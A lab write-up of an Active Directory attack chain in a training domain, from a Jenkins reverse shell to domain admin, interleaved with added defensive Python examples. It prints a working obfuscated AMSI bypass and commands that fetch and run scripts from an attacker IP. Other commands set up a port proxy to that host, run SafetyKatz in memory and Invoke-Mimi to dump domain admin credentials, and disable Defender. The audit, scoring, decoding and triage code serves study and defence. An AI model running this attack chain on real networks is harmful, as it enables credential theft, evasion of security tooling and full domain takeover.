# Evasion

### Lab 7 Scenario:

* Attack Path 1:
  * Student -> dcorp-ci via Jenkins
  * dcorp-ci is local admin on -> dcorp-mgmt
  * Using local admin privileges on dcorp-mgmt, we extracted domain admin credentials and used them to access dcorp-dc from Student.

* Attack Path 2 (Derivative Local Admin, or the shortest path to DA):
  * Student has local admin privileges on dcorp-adminsrv.
  * To extract credentials, we evaded AppLocker.
  * dcorp-adminsrv has derivative local admin privileges on dcorp-mgmt.
  * We extracted domain admin credentials from dcorp-mgmt and used them to access dcorp-dc from Student.

* The student machine (student372) has exploited Jenkins to get a reverse shell running as "dcorp\ciadmin".

* From dcorp\ciadmin, we disable Script Block Logging before running the AMSI bypass script. This is done to avoid PowerView being detected.

* We transfer PowerView to ciadmin to check domain sessions using `Find-DomainUserLocation` and find that there is a domain admin session on the dcorp-mgmt server.

* We can abuse this using WinRS or PSRemoting.

* **Abuse using WinRS**

  * We first check whether we can execute commands on dcorp-mgmt and whether the WinRM port is open.
  * Since we can run commands, we want to run SafetyKatz.exe on dcorp-mgmt.
  * We want SafetyKatz.exe to run in memory without touching disk. For this, we download NetLoader and use xcopy (since we have admin access as ciadmin) to copy Loader.exe to dcorp-mgmt.
  * We also want to avoid detection on dcorp-mgmt caused by it reaching out to a remote IP to download SafetyKatz. So instead of calling the attacker IP directly, we port forward localhost to the attacker IP.
  * Since Defender would detect SafetyKatz even when run through NetLoader, we encode the arguments using ArgSplit.bat and copy the output into Safety.bat, which runs SafetyKatz.exe through the loader with the encoded arguments.
  * We download Safety.bat on ciadmin and xcopy it to dcorp-mgmt.
  * Finally, we use WinRS to run Safety.bat, which uses Loader.exe to download and execute SafetyKatz.exe in memory on dcorp-mgmt.
  * We get the credentials of svcadmin, a domain administrator.

* **Abuse using PSRemoting**
  * Check whether we can execute commands on dcorp-mgmt using PSRemoting.
  * Download Invoke-Mimi.ps1 on dcorp-mgmt to dump hashes.
  * Disable AMSI either using the conventional method or using Set-MpPreference (since we have admin access on dcorp-mgmt).
  * After disabling it, we run Invoke-Command to call Invoke-Mimi on the session object we created while disabling AMSI.
  * We finally get the hashes.

* **Using Over-Pass-The-Hash**
  * We can use O-PTH (Over-Pass-The-Hash) to use svcadmin's credentials.
  * From an elevated shell, we can use Rubeus, SafetyKatz or Invoke-Mimi to start a process from the hash we obtained earlier and access the domain controller.

* **Derivative Local Admin**
  * We look for machines on which student372 has admin privileges using Find-PSRemotingLocalAdminAccess.
  * We find that student372 has local admin access on dcorp-adminsrv. We use Enter-PSSession to get a shell on dcorp-adminsrv as student372.
  * When we try to turn off script logging or bypass AMSI, it does not work because the PSRemoting session runs in Constrained Language Mode (CLM).
  * We can check this using `$ExecutionContext.SessionState.LanguageMode`
  * This is caused by either AppLocker or WDAC (Windows Defender Application Control). Both are application allow-listing solutions from Microsoft. We can check the AppLocker policy using: `Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections`
  * We find that everyone can run scripts from the Program Files directory.
  * We can disable Defender and run any script from Program Files.
  * We cannot use dot sourcing because of CLM, so we use Invoke-MimiEx.ps1, which is Invoke-Mimi.ps1 with "Invoke-Mimi -Command sekurlsa::ekeys" appended at the end of the file.
  * From the student machine, we copy Invoke-MimiEx.ps1 to dcorp-adminsrv's Program Files.
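
The weakness exploited in the Derivative Local Admin path is an AppLocker policy that lets Everyone run scripts from a directory a local administrator can write to. The following audit script is an added example, not part of the lab notes or of any course material: it parses a policy modelled on the XML that `Get-AppLockerPolicy -Effective -Xml` exports, and reports collections that are not enforced plus Allow rules granted to Everyone (SID `S-1-1-0`) whose path falls under a root worth reviewing. The sample policy and the list of roots are constructed for the example.

```python
"""Audit an exported AppLocker policy for Everyone-Allow path rules (added example)."""
import xml.etree.ElementTree as ET

EVERYONE_SID = "S-1-1-0"

# Path roots to review when Everyone may run from them. %PROGRAMFILES% is the one
# the lab abuses: a local admin can write there, so an Everyone Allow rule on it
# lets an admin-turned-attacker drop and run any script. Assumption: these are the
# roots worth reviewing; extend the tuple for your environment.
REVIEW_ROOTS = ("%PROGRAMFILES%", "%WINDIR%", "*")

# Constructed policy in the shape of a Get-AppLockerPolicy -Effective -Xml export.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="1" Name="Admins: all files" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="Enabled">
    <FilePathRule Id="2" Name="Scripts in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="3" Name="Scripts in Windows" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="4" Name="Admins: all scripts" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"""


def audit_applocker(policy_xml: str) -> list:
    """Return human-readable findings: unenforced collections and Everyone path allows."""
    findings = []
    root = ET.fromstring(policy_xml)
    for coll in root.findall("RuleCollection"):
        ctype = coll.get("Type", "?")
        mode = coll.get("EnforcementMode", "NotConfigured")
        if mode != "Enabled":
            findings.append(f"{ctype}: collection not enforced (EnforcementMode={mode})")
        for rule in coll.findall("FilePathRule"):
            # Only Allow rules for Everyone widen what an ordinary user may run.
            if rule.get("Action") != "Allow" or rule.get("UserOrGroupSid") != EVERYONE_SID:
                continue
            for cond in rule.iter("FilePathCondition"):
                path = cond.get("Path", "")
                if path.upper().startswith(REVIEW_ROOTS):
                    findings.append(
                        f"{ctype}: Everyone may run from {path} (rule '{rule.get('Name')}')"
                    )
    return findings


if __name__ == "__main__":
    for finding in audit_applocker(SAMPLE_POLICY):
        print(finding)
```

A finding on a `%PROGRAMFILES%\*` rule does not by itself mean the policy is broken; it means that anyone who can write under Program Files (every local administrator, or any user granted write on a subfolder by a vendor installer) can run scripts there. Replacing broad path rules with publisher or hash rules, and keeping every collection in Enforce mode, removes the path the lab takes.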

## AMSI Bypass

First disable Enhanced Script Block Logging so that the AMSI bypass itself is not logged.

```powershell
iex (iwr http://172.16.100.72/sbloggingbypass.txt -UseBasicParsing)
```

Then run the below command to bypass AMSI

{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

{% endcode %}
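
The one-liner above is recognisable even without knowing what it does: command and member names are broken up with backticks, strings are rebuilt from short `'..'+'..'` fragments, and the `-f` format operator reassembles names from numbered pieces. A defender who keeps script block logging on (event ID 4104 in the PowerShell operational log) can score each logged block on exactly those features. The scorer below is an added example, not code from the lab notes; the weights, the threshold and both sample blocks are constructed, and the "obfuscated" sample is a harmless command written in the same style rather than the bypass itself.

```python
"""Score PowerShell script-block text for obfuscation features (added example)."""
import re

# Each regex is an assumption about what "looks obfuscated"; tune against your
# own baseline of 4104 events before alerting on it.
RE_BACKTICK_IN_WORD = re.compile(r"[A-Za-z]`(?![nrtabfve0])[A-Za-z]")  # Inv`oke; skips `n `t escapes
RE_CONCAT_JOIN = re.compile(r"'\s*\+\s*\(?\s*'")                       # 'Am'+'si'
RE_FORMAT_OP = re.compile(r'\{\d+\}[^"]*"\s*-f\b', re.IGNORECASE)      # "{1}{0}" -f ...

WEIGHTS = {"backtick_in_word": 3, "concat_join": 2, "format_operator": 4}
THRESHOLD = 8  # constructed cut-off for the samples below


def features(script_block: str) -> dict:
    """Count each obfuscation feature in one script block."""
    return {
        "backtick_in_word": len(RE_BACKTICK_IN_WORD.findall(script_block)),
        "concat_join": len(RE_CONCAT_JOIN.findall(script_block)),
        "format_operator": len(RE_FORMAT_OP.findall(script_block)),
    }


def obfuscation_score(script_block: str) -> int:
    """Weighted sum of the feature counts."""
    return sum(WEIGHTS[name] * count for name, count in features(script_block).items())


def suspicious_blocks(blocks, threshold=THRESHOLD):
    """Indices of the blocks whose score reaches the threshold."""
    return [i for i, block in enumerate(blocks) if obfuscation_score(block) >= threshold]


# Constructed samples: a harmless command written in the bypass's style, and an
# ordinary admin one-liner that should score zero.
OBFUSCATED_SAMPLE = "Wr`Ite-Out`Put ( ('He'+'l'+'lo') + ('Wo'+'rl'+'d') ); ( \"{1}{0}\" -f 'bar','foo' )"
BENIGN_SAMPLE = r"Get-ChildItem -Path C:\Windows\Temp | Where-Object { $_.Length -gt 1MB } | Sort-Object Length"

if __name__ == "__main__":
    for sample in (OBFUSCATED_SAMPLE, BENIGN_SAMPLE):
        print(obfuscation_score(sample), features(sample))
    print("flagged:", suspicious_blocks([OBFUSCATED_SAMPLE, BENIGN_SAMPLE]))
```

The point of scoring rather than pattern-matching the bypass string is that the features survive re-obfuscation: a different split of the same command still has backticks inside identifiers and a pile of two-character string fragments. Note that the preceding step in the lab (disabling script block logging) is aimed at exactly this telemetry, so a sudden stop in 4104 events from a host is itself worth an alert.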

## NetLoader

Download the loader and xcopy it to dcorp-mgmt.

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

{% endcode %}

## Port Forward Localhost:80 to Attacker Machine

{% code overflow="wrap" %}

```powershell
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"
```

{% endcode %}

## Running SafetyKatz

### Use Loader without Encoding

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Loader.exe -OutFile C:\Users\Public\Loader.exe

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

{% endcode %}

### Use Loader after Encoding (Safety.bat)

Encode the SafetyKatz arguments using **ArgSplit.bat**

```
C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
```

Include the ArgSplit output in **Safety.bat**

```batch
@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args %Pwn% exit
```
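
ArgSplit hides the argument by spreading it over one-character `set "x=.."` variables and rebuilding it with a `%a%%b%...` expansion, so the string never appears literally in the file. An analyst who recovers a batch file like Safety.bat from a host or a share can replay the `set` lines and read the expanded command lines without executing anything. The decoder below is an added example, not part of the lab notes or of ArgSplit itself; the sample batch text is constructed from the format shown above, with the tool path replaced by a placeholder.

```python
"""Recover values hidden by ArgSplit-style batch variable splitting (added example)."""
import re

RE_SET = re.compile(r'^\s*set\s+"([^=]+)=(.*)"\s*$', re.IGNORECASE)  # set "name=value"
RE_VAR = re.compile(r"%([^%\s]+)%")                                  # %name% reference


def expand(text: str, env: dict) -> str:
    """Expand %name% using the variables defined so far; cmd expands when the line runs."""
    return RE_VAR.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)


def decode_batch(bat_text: str):
    """Replay set lines in order; return (variables, expanded non-set command lines)."""
    env, commands = {}, []
    for raw in bat_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = RE_SET.match(line)
        if m:
            # Variable names in cmd are case-insensitive, so normalise the key.
            env[m.group(1).strip().lower()] = expand(m.group(2), env)
        else:
            commands.append(expand(line, env))
    return env, commands


def looks_like_argsplit(bat_text: str, min_single_char_vars: int = 8) -> bool:
    """Detection heuristic: many set lines with one-character values is the ArgSplit signature."""
    singles = sum(
        1 for line in bat_text.splitlines()
        if (m := RE_SET.match(line.strip())) and len(m.group(2)) == 1
    )
    return singles >= min_single_char_vars


# Constructed sample in the layout ArgSplit produces; the tool path is a placeholder.
SAMPLE_BAT = r"""@echo off
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
echo %Pwn%
C:\Tools\placeholder-tool.exe -Args %Pwn% exit
"""

if __name__ == "__main__":
    variables, commands = decode_batch(SAMPLE_BAT)
    print("argsplit-like:", looks_like_argsplit(SAMPLE_BAT))
    for cmd in commands:
        print(cmd)
```

The same replay works for any batch file that builds strings from earlier variables, not only ArgSplit output, because it follows cmd's own rule of expanding `%name%` at the moment the line executes. The `looks_like_argsplit` check is the cheap triage step: a batch file with a dozen single-character `set` lines is rare outside this kind of splitting.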

### Download & Execute SafetyKatz.exe in-memory

{% code overflow="wrap" %}

```powershell
iwr http://172.16.100.72/Safety.bat -OutFile C:\Users\Public\Safety.bat

echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat

$null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat"
```

{% endcode %}

## PowerShell Remoting

Check whether we can run commands on dcorp-mgmt using PSRemoting

{% code overflow="wrap" %}

```powershell
Invoke-Command -ScriptBlock {$env:username;$env:computername} -ComputerName dcorp-mgmt
```

{% endcode %}

Load Invoke-Mimi, which we will use to dump the hashes of domain admin svcadmin:

{% code overflow="wrap" %}

```powershell
iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)
```

{% endcode %}

### Disable AMSI using Set-MpPreference

```powershell
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```

Run Invoke-Mimi in the session and get the hashes

```powershell
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess
```
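
Every step of the WinRS and PSRemoting paths above leaves a process-creation or remoting trace on dcorp-ci or dcorp-mgmt: the `netsh ... portproxy add` pivot, the `xcopy` to an administrative share, the loader fetching an executable from a loopback URL, and the `Set-MpPreference -Disable...` call. Commands run through WinRS execute under `winrshost.exe`, and PowerShell remoting sessions run under `wsmprovhost.exe`, so the parent process identifies remotely spawned activity. The triage logic below is an added example, not part of the lab notes: it runs a few rules over constructed event records shaped like normalised Security 4688 / Sysmon 1 entries (command-line auditing must be enabled for 4688 to carry the command line). The patterns are assumptions derived from the commands in this write-up.

```python
"""Flag remote-execution and evasion steps in process-creation records (added example)."""
import re

# Rule name -> regex over the command line. Tune against your own baseline.
RULES = [
    ("portproxy_added", re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I)),
    ("copy_to_admin_share", re.compile(r"\\\\[^\\\s]+\\[a-z]\$\\", re.I)),
    ("defender_setting_disabled", re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)),
    ("loopback_http_executable", re.compile(r"https?://(127\.0\.0\.1|localhost):\d+/\S+\.exe", re.I)),
]

# Parents that mean "started from a remote shell": the WinRM shell host used by
# winrs and the PowerShell remoting host. Unexpected children deserve a look.
REMOTE_SHELL_PARENTS = {"winrshost.exe", "wsmprovhost.exe"}


def detect(event: dict) -> list:
    """Return the names of every rule the event triggers, in rule order."""
    hits = [name for name, rx in RULES if rx.search(event.get("cmdline", ""))]
    if event.get("parent", "").lower() in REMOTE_SHELL_PARENTS:
        hits.append("spawned_by_remote_shell")
    return hits


def triage(events) -> list:
    """(host, hits) for every event that triggered at least one rule."""
    return [(e["host"], detect(e)) for e in events if detect(e)]


# Constructed events modelled on the lab steps, plus one benign record.
SAMPLE_EVENTS = [
    {"host": "dcorp-mgmt", "parent": "winrshost.exe",
     "cmdline": r"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72"},
    {"host": "dcorp-ci", "parent": "powershell.exe",
     "cmdline": r"xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe"},
    {"host": "dcorp-mgmt", "parent": "wsmprovhost.exe",
     "cmdline": r"powershell.exe -c Set-MpPreference -DisableIOAVProtection $true"},
    {"host": "dcorp-mgmt", "parent": "winrshost.exe",
     "cmdline": r"C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -Args sekurlsa::ekeys exit"},
    {"host": "dcorp-mgmt", "parent": "explorer.exe",
     "cmdline": r"notepad.exe C:\Users\admin\notes.txt"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, hits)
```

The loopback rule is what the port-forward trick buys the defender: forwarding `127.0.0.1:8080` to the attacker host keeps the real address out of the loader's command line, but it forces an unusual `netsh portproxy add` onto the box and a loopback download URL into the next command, both of which are rarer in normal administration than the direct download would have been. Defender's own operational log also records configuration changes such as `DisableIOAVProtection`, which gives a second, independent signal for the Set-MpPreference step.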
